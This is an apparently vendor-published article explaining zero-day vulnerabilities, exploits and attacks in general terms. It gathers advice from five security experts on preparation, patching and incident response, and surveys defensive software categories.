5 Security Experts Share Best Practices to Prevent Zero-Day Attacks

Imagine you accidentally leave a rarely-used window open in your home.

You don’t think anything of it until you notice things going missing. Thieves have been sneaking in and out of your house for days, availing themselves of your stuff using that neglected window. 

Zero-day attacks are exactly the same. Hackers find and exploit a vulnerability in your system before you know it exists. And until you find the bug, you can’t fix the problem. 

Today, zero-day vulnerabilities are being found on everyday platforms like Apple iOS, Google Chrome, and Windows. Cybercrimes and increasing variants of already found exploits are increasingly making it difficult to mitigate zero-day attacks.

For enterprises facing cybersecurity threats from zero-day attacks, the situation paints a grim picture. It feels as if there’s no hope of finding and preventing these kinds of attacks.

But experts note that it’s not always the case. Using the right security software and implementing best cybersecurity practices can guard against zero-day attacks. Keep reading to find out how.

What is a zero-day attack? 

Software developers don’t want to create software with bugs, obviously, but every software has unintentional flaws. After all, every 1,000 lines of code have 3 to 20 bugs. Some of these vulnerabilities create a security weakness in the design, implementation, or operation of a system or application. 

Cybercriminals look for these kinds of cybersecurity vulnerabilities to execute commands disguised as familiar systems. They could access and steal restricted data, behave like another user, or launch denial of service attacks. For instance, a system vulnerability in cloud storage might provide access to otherwise secure data on the cloud. 

Software vendors, developers, and programmers are always scanning for bugs like these. When they discover one, they patch it up. However, when the vulnerability is out in the open and unfixed, cybercriminals get a free pass to exploit it.

Since vendors typically have no knowledge of such vulnerabilities beforehand, they literally have zero days to fix the bug before cybercriminals leverage it. 

Researchers Leyla Bilge and Tudor Dumitras have outlined the seven stages in the lifecycle of a zero-day vulnerability. 

1. Vulnerability introduced. You have software with a bug. It might be a coding mistake, missing encryption, or anything else that lets unauthorized people access the system.
2. Exploit released in the wild. Cybercriminals find the bug, release an exploit code or malicious payload, and use it to conduct attacks.
3. The vendor finds the vulnerability. Vendors or parties responsible for fixing the software discover the bug, either by their continuous testing or via third-party researchers. They start working on a patch.
4. Vulnerability disclosed in public. The vendor or affected parties publicly disclose information about the bug. The bug gets a common vulnerabilities and exposures (CVE) number for easy identification. Some vulnerabilities remain private and get patched quietly.
5. Anti-virus signatures released. Once the involved parties know about the vulnerability, cybersecurity vendors detect signatures of attacks and exploit the hackers made using the flaw. They then update their scanning and detection systems.
6. Patch released. Meanwhile, the software vendor releases patches for the vulnerability. Anyone who updates their systems with patches is no longer susceptible to attacks.
7. Patch deployment complete. Once patch deployment is complete, the vulnerability can no longer be exploited in any way.

Zero-day vulnerability vs. zero-day exploit vs. zero-day attack

It’s common to confuse zero-day attacks with zero-day vulnerabilities and zero-day exploits. But they are different. 

Zero-day vulnerability: A software vulnerability yet to be known to developers or a flaw with no patch. Zero-day vulnerabilities could be missing data encryption, misconfigurations, incorrect authorizations, or coding errors.

Zero-day exploit: Techniques or methods cybercriminals use to gain access to a system using a zero-day vulnerability. The methods range from spear phishing to malware. 

Zero-day attack: A successful zero-day exploit that sabotages a system or causes damage in terms of data breach or theft is a zero-day attack. 

How does a zero-day attack work? 

Your defense against zero-day attacks is effective only if you know how an attack works. A zero-day attack goes like this:

1. Discover vulnerabilities. Attackers look for critical cybersecurity vulnerabilities in popular platforms. They even look to buy zero-day vulnerabilities from the black market, where zero-day bugs and exploits are sold for high prices. 
2. Create the exploit code. Hackers create exploit codes to take advantage of the zero-day vulnerability. Exploit codes are a piece of malicious code with a small malware that downloads additional malware when activated. The malware allows hackers to infect vulnerable devices, execute code, act as an admin, or perform potentially damaging actions.
3. Find vulnerable systems. Criminals scan for systems that are vulnerable to the exploit using bots or automated scanners and plan for a targeted or mass attack, depending on their motives.
4. Deploy the exploit. The most common tactic attackers use to distribute exploits is through web pages that unknowingly host malicious code and exploits in their ads. Sometimes, exploits are deployed via emails. It can be in the form of spear phishing, targeting specific individuals, or mass phishing emails to a large group of people. 
   
   The attacker's malware gets downloaded when a user visits malicious websites or clicks on phishing emails. Attackers also use exploit kits, a collection of exploits that target different software vulnerabilities via web pages. These kinds of exploits can hack into operating systems, applications, web browsers, open-source components, hardware, and IoT devices.
5. Launch the exploit. Once the exploit is released, criminals infiltrate the system, compromising the operations and data of the device or even the entire connected network. 
   
   Hackers use exploits to steal data, launch ransomware, or conduct supply chain attacks. When it comes to supply chain attacks, attackers typically use a zero-day vulnerability to break into critical software providers. Once inside, the hackers hide additional malware in the application, unbeknownst to the vendor. The malicious code also gets downloaded with the legitimate code when the software is released to the public, resulting in a significant number of victims. 
   
   For instance, a critical zero-day vulnerability in the SolarWinds Orion platform resulted in a massive supply chain attack that affected hundreds of businesses and government agencies.

Who executes zero-day attacks?

Different kinds of people carry out zero-day attacks for varying reasons. They could be:

• Cybercriminals, who do it for monetary gain. A study found that a third of all hacking groups exploiting zero-day vulnerabilities are financially motivated.
• State-sponsored hackers, who do it for political reasons or to attack another country’s cyberinfrastructure. For instance, the Chinese state-sponsored threat group APT41 used a zero-day vulnerability to target a U.S. state government network in 2021.
• Hacktivists, who do it for social or political causes.
• Corporate spies, who do it to surveil competing businesses.

Why are zero-day attacks dangerous?

Zero-day attacks are one of the fastest-growing cybersecurity threats. With the rapid adoption of cloud, mobile, and internet-of-things (IoT) technologies, the number and complexity of software platforms we use daily are increasing. More software leads to more software bugs. More bugs typically mean more gateways for attackers to exploit.

For criminal hackers, the vulnerabilities in popular software like Microsoft Office or Google Chrome represent a free pass to attack any target they want, from Fortune 500 companies to millions of mobile phone users worldwide.

Zero-day attacks are so vicious because they typically go undiscovered for at least ten months – longer in some cases. Until the attack is found, the software remains unpatched, and anti-virus products cannot detect the attack through signature-based scanning. They’re also unlikely to be observed in honeypots or lab experiments.

And even if the vulnerability is exposed, criminals rush in to take advantage of the situation. Once an unpatched vulnerability is public, it takes only 14 days for an exploit to be available in the wild. While the attacks are initially intended for a specific organization or person, it doesn’t take long for other threat actors to exploit the vulnerability as widely as possible.

Up until the last few years, zero-day exploits were mostly found and used by state-sponsored cyber groups. Stuxnet, one of the most famous zero-day attacks on Iran’s nuclear program, is speculated to be a joint operation between the United States and Israel.

But today, financially motivated cybercrime groups use zero-day exploits. They’re making money with zero-day attacks using ransomware. Increasing attacks on the IT services supply chain are also ramping up with the objective of targeting downstream third-party businesses.

Adding to the mix is that hackers could potentially use artificial intelligence (AI) and machine learning (ML) solutions to instigate sophisticated attacks.

For instance, in 2022, researchers found they could use ChatGPT to create phishing emails and ransomware campaigns for MacOS. Anyone, regardless of their technical expertise, could use these AI tools to create codes for malware or ransomware on demand.

These attacks have wide ramifications, from data theft and spreading malware to financial losses and total system takeover. More than ever, businesses have to be prepared for zero-day attacks to protect their data and network security.

5 experts reveal common missteps in defense against zero-day attacks

We asked five cybersecurity experts about the most prevalent and avoidable missteps businesses take that make them vulnerable to zero-day threats and attacks. Here’s what they said.

Insufficient preparation

Pete Nicoletti from Check Point Software noted that businesses, especially small-to-midsize, aren’t usually ready for zero-day attacks.

“Let’s look at the scope of the problem first. Vulnerable applications, partners, employees distributed everywhere, in cloud resources, colocation servers, desktops, laptops, insecure home wireless, bring-your-own-device, cell phones, and more. All create a very large threat surface and require specific solutions, priority, budget, and personal attention,” Nicoletti said.

He noted that attackers are well-funded with billions of dollars in ransomware and are now creating thousands of new malware variants each month, along with billions of well-crafted phishing emails. They’re exploiting zero-day vulnerabilities and hammering on unpatched weak spots.

“Even some security vendors have zero days and are being leveraged as an exploitation vector, turning up the irony dial to the max.”

Pete Nicoletti
Field CISO, Check Point Software

Considering how expensive and hard zero-day attacks are to mitigate, Nicoletti insists businesses should be ready to address the security risks with reasonable expenditures.

Unrepaired known vulnerabilities

Paul Hadjy, the CEO and co-founder of Horangi Cyber Security, talked about the importance of getting the basics of security right.

“Many companies ask us about dealing with zero-day vulnerabilities when they still have not fully matured their capabilities and mechanisms for dealing with known vulnerabilities,” Hadjy said.

He told us that while it’s unfortunate to get attacked on a zero-day vulnerability, getting attacked on a known vulnerability is even worse.

“Both point to a situation we come across very often. The situation where organizations are focusing on what is trendy and relevant when they should be focusing on the basics of security,” he said.

“Basic security capabilities should not be overlooked for something that is new and shiny.”

Paul Hadjy
CEO and Co-founder, Horangi Cyber Security

Poor management practices

Caitlin Condon, senior manager of Security Research at Rapid7, noted that companies lack a basic foundational vulnerability management practice.

“The most frequent question we hear organizations asking when there's a high-profile zero-day attack is, ‘do we use this vulnerable product?’ followed by ‘have we already been exploited?’” Condon said.

“A crisis is not an ideal time for a business to start thinking about how to catalog inventory, set up centralized logging or alerting, or implement an emergency patching plan for critical, actively exploited vulnerabilities.”

Caitlin Condon
Senior Manager, Security Research, Rapid7

Condon said that the best preparation against zero days is to put good core policies and practices in place. “Then, when there's a cybersecurity incident where risk reduction is measured in minutes, you have a well-understood baseline on top of which to enact emergency procedures, operationalize intelligence, and prioritize remediations.”

Lack of visibility

Stan Wisseman, the chief security strategist of CyberRes, a Microfocus line of business, highlights the need for better visibility when it comes to the software businesses use.

“Organizations need greater transparency into the software components that make up their applications and products so they can conduct rapid impact analysis,”  Wisseman said. He explained the necessity of doing so with the example of zero-day attacks that happened when Log4Shell or Log4J vulnerability were revealed in Apache.

“With Log4J, anybody running anything with Java had to manually email their vendors to figure out if Log4J was in their products and validate the version. If they were affected, they had to determine what to do about it. Everyone was scrambling.”

He added that businesses need to do software composition analysis (SCA) and have software bill of materials (SBOM) to quickly lessen risks posed by the zero-day attack. “You need to do your due diligence and ensure they have validated security controls in place,” he said. 

“The value of software composition analysis (SCA) and having software bill of materials (SBOMs) available is that you can respond quickly to mitigate risks posed by the zero-day attack.”

Stan Wisseman
Chief Security Strategist, CyberRes

Neglected security and compliance

Ben Herzberg, Vice-President at Satori Cyber, shared his takes on the problems new businesses have with preventing zero-day attacks.

“New businesses are, generically speaking, in growth mode. And lean. These two factors can cause neglect of security and compliance. This can lead to more excessive security risks, both known and zero-day.”

Zero-day attack prevention: How to prevent zero-day threats

Now that you know where some of the problems lie, peruse expert advice about preventing zero-day attacks.

1. Understand your risks

Condon highlighted the importance of businesses understanding the dangers cyber attacks pose.

“With limited resources to secure an ever-expanding list of IT infrastructure and cloud services, it's important to build a security program that takes your specific risk context into account.”

Caitlin Condon
Senior Manager, Security Research, Rapid7

“Maybe you're a cloud-first company that needs to tailor its deployment and scanning rules to prevent misconfigurations that expose data or run up high bills,” she said. “Maybe you're a retail company whose point-of-sale (POS) systems are targeted during the holiday season or a streaming company living in a 99.999% uptime world where denial-of-service attacks are a business catastrophe."

“Understanding which types of risks have the highest impact on your business allows you to build a security program where goals and metrics are customized to your needs and where you can more easily communicate progress and priorities to non-security stakeholders across your organization.”

Adding to this, Herzberg stressed the importance of building an incremental plan that addresses threats by risk factor.

“You will probably not be able to lower your risk to 0%. It is, therefore, important to prioritize high-risk areas...Building great security around the sensitive data you have is more important than that of generic log data.”

Ben Herzberg
Vice-President, Satori Cyber

2. Get your basics right

“Businesses need to get their basics covered first,” said Nicoletti.

Adding to this, Wisseman pointed out that the advice provided by the Cybersecurity and Infrastructure Security Agency (CISA) in its Shields Up program is great for companies of all sizes that want to improve their resilience.

3. Set up multiple layers of security

“It is important to make sure that there are multiple layers of security,” Herzberg said.  "For example, if an endpoint is compromised, which may be as a result of a zero-day exploit that’s out of your control, think about how you make sure the damage is contained and will not lead to compromising all your platforms.” A layered approach ensures that an attacker penetrating one layer of defense will be stopped by a subsequent layer.

4. Get incident response and patch management capabilities

Hadjy called these capabilities “foundational,” and went on to say, “Many technologies, such as using a cloud security posture management tool and cloud identities and entitlements management (CIEM), can help you improve your patch management capabilities and are highly recommended.”

G2 cybersecurity analyst Sarah Wallace also called attention to the importance of having updated cybersecurity software. “Cyber criminals know a lot of organizations have dated, legacy security software so it's an easy target for them,” said Wallace.

5. Hold simulations and test

Hadjy emphasized improving incident response strategy with frequent simulations and tests. “Have a solid plan in place, and practice, practice, practice!”

Hadjy explained to us that holding simulations such as tabletop exercises is the best way to see how well your incident response plans work and to identify areas of improvement.

“You may not be able to control when or how you get attacked, but you can control many parts of your response when it happens,” he said. He also stressed the need to cultivate and promote a strong cybersecurity culture.

“Dealing with a zero-day attack is, in almost every way, the same as dealing with any other cyber attack. You have to respond to a situation you did not expect, and you often have very little information to go on.”

Paul Hadjy
CEO & Co-founder, Horangi Cyber Security

“Ensure that your entire organization is educated and stays vigilant against potential threats like phishing. Provide tools and channels for employees to flag and report phishing attempts and threats,” Hadjy said.

“If employees learn from day one that security is not an obstacle that needs to be bypassed, but a business enabler, it makes a huge difference in their behavior for the years to come,”  Herzberg.

To conclude, Nicoletti left us with this guidance. “Change your mindset from detection to prevention as you must stop zero days in their tracks.”

Security solutions against zero-day attacks

Different security solutions help detect and defend against zero-day threats and other cyber security vulnerabilities and attacks. You can use a combination of these tools based on your needs and strengthen your business’s security posture.

Patch management software

Patch management solutions ensure your tech stack and IT infrastructure are up to date. Organizations utilize this tool to

• Keep a database of software, middleware, and hardware updates.
• Get alerts on new updates or to auto-update.
• Notify admins of out-of-date software usage.

Risk-based vulnerability management software

More advanced than traditional vulnerability management tools, risk-based vulnerability management software identifies and prioritizes vulnerabilities based on customizable risk factors. Companies can use this tool to

• Analyze applications, networks, and cloud services for vulnerabilities.
• Prioritize vulnerabilities based on risk factors using ML.
  
  

Tools like attack surface management software can also be used to scan for and remediate vulnerabilities.

Security risk analysis software

Security risk analysis software monitors IT stacks, including networks, applications, and infrastructure, to identify vulnerabilities. Businesses use this solution to

• Analyze a company’s security software, hardware, and operations.
• Get information on vulnerabilities or holes in their security.
• Get recommendations to optimize security planning across IT systems.

Intrusion detection and prevention systems are also useful for knowing about suspicious activities, malware, socially engineered attacks, and other web-based threats.

Threat intelligence software

Threat intelligence software provides information on the newest cyber threats, be it zero-day attacks, new malware, or exploits. Organizations use threat intelligence software to

• Get information on emerging threats and vulnerabilities.
• Find out remediation practices for emerging threats.
• Assess threats on different network and device types.

Security information and event management (SIEM) software

SIEM is a combination of security tools that perform functions of both security information monitoring software and security event management software. The solution provides a single platform to facilitate real-time security log analysis, investigation, anomaly detection, and threat remediation. Businesses can use SIEM to

• Collect and store IT security data.
• Monitor for incidents and abnormalities in the IT system.
• Gather threat intelligence.
• Automate threat response.
  
  

Incident Response software

Incident response tool is usually the last line of defense against any cyber threats. The tool is used to remediate cybersecurity issues as they arise in real-time. Businesses use the solution to

• Monitor and detect anomalies in IT systems.
• Automate or guide security team through the remediation process.
• Store incident data for analytics and reporting.
  
  

Security orchestration, automation, and response (SOAR)  software

SOAR combines the functionalities of vulnerability management, SIEM, and incident response tools. Organizations use the solution to

• Integrate security information and incident response tools.
• Build security response workflows.
• Automate tasks related to incident management and response.

Shields up

Zero-day attacks are, no doubt, increasingly common and difficult to prevent. But you must have your best defenses against it. Know the tech stack you have. Maintain a robust security infrastructure for finding and fixing vulnerabilities.

Keep monitoring for anomalies. Make your employees aware of your security policies and threats. Have an incidence response plan, and test them regularly. Mitigate and contain an attack if it happens. Follow the best security practices with the security solutions mentioned above, and you’ll be prepared.

Learn more about cybersecurity tools that can protect your company from zero-day threats and other cyber attacks.